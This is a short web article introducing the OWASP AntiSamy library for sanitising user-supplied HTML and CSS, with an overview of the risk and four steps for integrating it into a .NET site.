Menu

Introduction to PCI DSS (Payment Card Industry Data Security Standard)   Introduction to PCI DSS (Payment Card Industry Data Security Standard)   

Data Protection Act 1998   Data Protection Act 1998   

Secure HTML Practices   Secure HTML Practices   

SQL Injection Attack - Introduction and Mitigation Steps   SQL Injection Attack - Introduction and Mitigation Steps   

Cross Site Scripting (XSS) – Introduction and Mitigation Steps   Cross Site Scripting (XSS) – Introduction and Mitigation Steps   

Audit and Testing Tools for Web Application Security   Audit and Testing Tools for Web Application Security   

Threat Modeling for Web Application Security - Practice Guide   Threat Modeling for Web Application Security - Practice Guide   

OWASP AntiSamy Project

Published on: 8/16/2014
Topic: Web Application Security
The OWASP AntiSamy project is available in versions for Java & .Net respectively. It’s an API that helps you make sure that clients do not supply malicious cargo code in the HTML they supply for their profile, comments, etc. that gets persisted on the server.


Table of Contents

Overview

The term malicious code in terms of web applications is usually regarded only as JavaScript. Cascading Stylesheets are only considered malicious when they invoke the JavaScript engine. However, there are many situations where “normal” HTML and CSS can be used in a malicious manner.

Typical Internet users are largely ineffective when it comes to writing HTML/CSS, so where do they get their HTML from? Usually they copy it from somewhere out on the web. Simply rejecting their input without any clue as to why is jolting and annoying. Annoyed users go somewhere else to do their social networking.

The OWASP licensing policy allows OWASP projects to be released under any approved open source license. Under these guidelines, AntiSamy .NET is distributed under a BSD license.

Getting Started There’s 4 steps in the process of integrating AntiSamy:

1.Download AntiSamy from its home on Google Code
2.Choose one of the standard policy files that matches as close to the functionality you need:
antisamy-slashdot.xml
3.Tailor the policy file according to your site’s rules
4.Call the API from the code


Continue Reading: Using AntiSamy .NET